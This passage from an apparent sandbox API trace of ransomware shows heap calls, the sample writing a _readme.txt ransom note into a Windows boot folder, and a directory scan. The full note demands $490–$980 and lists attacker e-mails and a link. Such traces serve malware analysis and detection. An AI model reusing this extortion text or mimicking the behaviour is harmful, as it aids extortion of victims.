hHeap=0x620000) returned 1 [0184.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0184.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.163] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0184.163] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.163] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.163] PathFindFileNameW (pszPath="") returned="" [0184.163] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.164] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.164] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.164] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.165] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0184.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.165] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0184.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.168] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.168] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.168] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.170] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.171] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.171] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.171] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.171] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.172] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.183] RtlAllocateHeap 